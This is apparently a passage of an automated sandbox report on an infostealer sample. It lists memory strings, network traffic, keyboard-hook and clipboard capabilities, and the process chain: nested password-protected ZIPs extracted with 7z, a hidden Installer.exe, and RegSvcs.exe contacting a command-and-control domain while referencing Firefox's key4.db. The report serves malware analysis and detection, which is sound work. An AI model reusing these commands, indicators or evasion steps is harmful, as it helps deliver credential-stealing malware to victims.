Source: file.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: file.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Installer.exe.9.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA2.crl0t
Source: file.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: file.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Installer.exe.9.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA2.crt0#
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000000.2101759997.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe, 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe.9.dr String found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp36U
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3S
Source: Installer.exe, 0000000B.00000000.2101759997.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe, 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmp, Installer.exe.9.dr String found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3openSizeofResourcegfDASrtdstyfewrtydwyu3467YdesauydgewyuyVirtualPr
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://joxi.net/4Ak49WQH0GE3Nr.mp3ouM
Source: Installer.exe.9.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: file.exe, Installer.exe.9.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegSvcs.exe, 0000000C.00000002.2319143883.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/
Source: RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/=
Source: RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/api
Source: RegSvcs.exe, 0000000C.00000002.2319745447.000000000346E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/apiAA==
Source: RegSvcs.exe, 0000000C.00000002.2319143883.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs/b
Source: RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs:443/api
Source: RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs:443/apihv.default-release/key4.dbPK
Source: RegSvcs.exe, 0000000C.00000002.2318932004.0000000000C09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://librari-night.sbs:443/apitPK
Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000003.2122322581.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.comg
Source: file.exe, Installer.exe.9.dr String found in binary or memory: https://sectigo.com/CPS0
Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: RegSvcs.exe, 0000000C.00000002.2319729025.000000000346B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.172:443 -> 192.168.2.5:49736 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to register a low level keyboard hook
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,00000000 0_2_00408DBB
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00433CD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 12_2_00433CD0
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00433CD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 12_2_00433CD0

System Summary
barindex
Drops password protected ZIP file
Source: file.bin.0.dr Zip Entry: encrypted
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_002496AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free, 5_2_002496AC
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405BFC 0_2_00405BFC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B0E0 0_2_0040B0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B0E4 0_2_0040B0E4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419973 0_2_00419973
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A900 0_2_0040A900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A270 0_2_0040A270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040AC20 0_2_0040AC20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409C20 0_2_00409C20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040D480 0_2_0040D480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040ED00 0_2_0040ED00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409DD0 0_2_00409DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419601 0_2_00419601
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004196DB 0_2_004196DB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418F40 0_2_00418F40
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0026F13E 5_2_0026F13E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00265458 5_2_00265458
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_002624C0 5_2_002624C0
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_002647AC 5_2_002647AC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00288817 5_2_00288817
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00250DCC 5_2_00250DCC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0024B114 5_2_0024B114
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0024F1B4 5_2_0024F1B4
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0025C278 5_2_0025C278
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00283528 5_2_00283528
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00272578 5_2_00272578
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0027066E 5_2_0027066E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0026D66C 5_2_0026D66C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0025D858 5_2_0025D858
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0026694C 5_2_0026694C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_002849A5 5_2_002849A5
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_002799B8 5_2_002799B8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_002779DC 5_2_002779DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0028DA30 5_2_0028DA30
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0027FA0C 5_2_0027FA0C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0028DC11 5_2_0028DC11
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00257C68 5_2_00257C68
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00258CA8 5_2_00258CA8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0028DD00 5_2_0028DD00
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00266E08 5_2_00266E08
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00248F18 5_2_00248F18
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0025AF58 5_2_0025AF58
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00251280 11_2_00251280
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_00255424 11_2_00255424
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0025DA20 11_2_0025DA20
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0026122C 11_2_0026122C
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0025DEB8 11_2_0025DEB8
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0026272D 11_2_0026272D
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: 11_2_0026134C 11_2_0026134C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00424800 12_2_00424800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004412A0 12_2_004412A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043BB70 12_2_0043BB70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00439310 12_2_00439310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00441BF0 12_2_00441BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00422BA0 12_2_00422BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00420CD0 12_2_00420CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0040DCB7 12_2_0040DCB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004195D1 12_2_004195D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00427E50 12_2_00427E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0040CEF5 12_2_0040CEF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00408F20 12_2_00408F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0042905E 12_2_0042905E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00403060 12_2_00403060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00429872 12_2_00429872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004418D0 12_2_004418D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00406090 12_2_00406090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041F090 12_2_0041F090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004070A0 12_2_004070A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004400A0 12_2_004400A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00409940 12_2_00409940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00409150 12_2_00409150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0042F960 12_2_0042F960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00438970 12_2_00438970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00403A60 12_2_00403A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00425A75 12_2_00425A75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0040B220 12_2_0040B220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041BAE6 12_2_0041BAE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041B2F0 12_2_0041B2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00439AF0 12_2_00439AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041CA80 12_2_0041CA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043FB70 12_2_0043FB70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043CB00 12_2_0043CB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043C310 12_2_0043C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041AB3B 12_2_0041AB3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00427BEB 12_2_00427BEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0042A3F0 12_2_0042A3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041C3FA 12_2_0041C3FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00407BB0 12_2_00407BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00404440 12_2_00404440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00406C10 12_2_00406C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00428C3F 12_2_00428C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00402CC0 12_2_00402CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041FC80 12_2_0041FC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00406550 12_2_00406550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00409DC0 12_2_00409DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0040ADE0 12_2_0040ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004415B0 12_2_004415B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043FB70 12_2_0043FB70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0040B6E0 12_2_0040B6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00424EE0 12_2_00424EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041A6A3 12_2_0041A6A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00420EA0 12_2_00420EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041DF60 12_2_0041DF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0041F710 12_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00438710 12_2_00438710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004237C0 12_2_004237C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_0043FFD0 12_2_0043FFD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_00404F8F 12_2_00404F8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 12_2_004277BD 12_2_004277BD
Enables security privileges
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Process token adjusted: Security Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 004029A6 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Code function: String function: 00252330 appears 36 times
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamefilezilla.exe6 vs file.exe
Source: file.exe, 00000000.00000003.2087206791.0000000002670000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.exe, vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.exe, vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs file.exe
Source: file.exe, 00000000.00000003.2083930319.0000000006A10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.dll, vs file.exe
Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs file.exe
Source: file.exe, 00000000.00000003.2084038077.0000000002790000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename7z.dll, vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamefilezilla.exe6 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@23/17@3/2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, 0_2_00409606
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_0024AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 5_2_0024AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 5_2_00251D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 5_2_00251D04
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040122A GetDiskFreeSpaceExW,SendMessageW, 0_2_0040122A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow, 0_2_004092C1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress, 0_2_004020BF
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\main Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: file.exe Virustotal: Detection: 14%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
